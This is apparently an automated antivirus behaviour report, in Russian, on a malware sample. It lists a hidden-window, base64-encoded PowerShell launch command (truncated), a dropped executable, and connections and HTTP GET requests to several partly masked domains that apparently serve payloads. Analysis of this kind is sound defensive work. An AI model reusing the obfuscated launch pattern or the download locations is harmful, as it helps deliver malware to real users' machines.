Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABTAGkAMAA0AGkAcABlAD0AWwBjAGgAYQByAF0ANAAyADsAJABJADIANABlAG0AMgBrAD0AKAAoACcARQAwACcAKwAnAHkAJwApACsAKAAnAHQAdwAnACsAJwAxACcAKQArACcAMQAnACkAOwAuACgAJwBuAGUAdwAtAGkAJw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1556
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1164095.cvr
- %HOMEPATH%\ieu5y5x\up_266o\nwiba7xx.exe
Удаляет следующие файлы
- %HOMEPATH%\ieu5y5x\up_266o\nwiba7xx.exe
Подменяет следующие файлы
- %HOMEPATH%\ieu5y5x\up_266o\nwiba7xx.exe
Сетевая активность
Подключается к
- 'th####etalks.com':80
- 'ex######uvarnasamudra.com':80
- 'ca####tendero.com':443
- 'te#####lamalinche.com':80
- 'ma####areliquia.com':80
- 'sf####tographer.com':80
- 'ne##.#ngheni.org':80
- 'ne##.#ngheni.org':443
TCP
Запросы HTTP GET
- http://th####etalks.com/wp-content/7A/
- http://ex######uvarnasamudra.com/wp-admin/D/
- http://te#####lamalinche.com/css/p/
- http://te#####lamalinche.com/politica-de-cookies/
- http://ma####areliquia.com/wp-includes/K/
- http://sf####tographer.com/battlemetrics-rust/uw/
- http://ne##.#ngheni.org/wp-includes/e/
Другие
- 'ca####tendero.com':443
- 'ne##.#ngheni.org':443
UDP
- DNS ASK th####etalks.com
- DNS ASK ex######uvarnasamudra.com
- DNS ASK ca####tendero.com
- DNS ASK te#####lamalinche.com
- DNS ASK ma####areliquia.com
- DNS ASK sf####tographer.com
- DNS ASK ne##.#ngheni.org
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABTAGkAMAA0AGkAcABlAD0AWwBjAGgAYQByAF0ANAAyADsAJABJADIANABlAG0AMgBrAD0AKAAoACcARQAwACcAKwAnAHkAJwApACsAKAAnAHQAdwAnACsAJwAxACcAKQArACcAMQAnACkAOwAuACgAJwBuAGUAdwAtAGkAJw...' (со скрытым окном)
